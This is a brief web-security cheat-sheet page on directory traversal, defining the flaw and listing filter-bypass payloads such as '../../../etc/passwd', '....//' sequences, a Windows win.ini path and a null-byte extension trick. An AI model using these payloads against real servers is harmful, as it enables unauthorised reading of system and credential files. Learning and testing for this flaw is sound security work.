🟩Directory Traversal

Directory traversal (or path traversal) is a web security vulnerability that allows an attacker to read arbitrary files on the server that is running an application. This might include application code and data, credentials for back-end systems, and sensitive operating system files

Bypass path traversal filters

..\..\..\windows\win.ini --> Windows OS
../../../etc/passwd
....//....//....//etc/passwd
/var/www/images/../../../etc/passwd 
../../../etc/passwd%00.png --> null byte bypass

URL Encoding

char

encode

PreviousAccess Control (Authorization)NextOS Command Injection

Last updated 11 months ago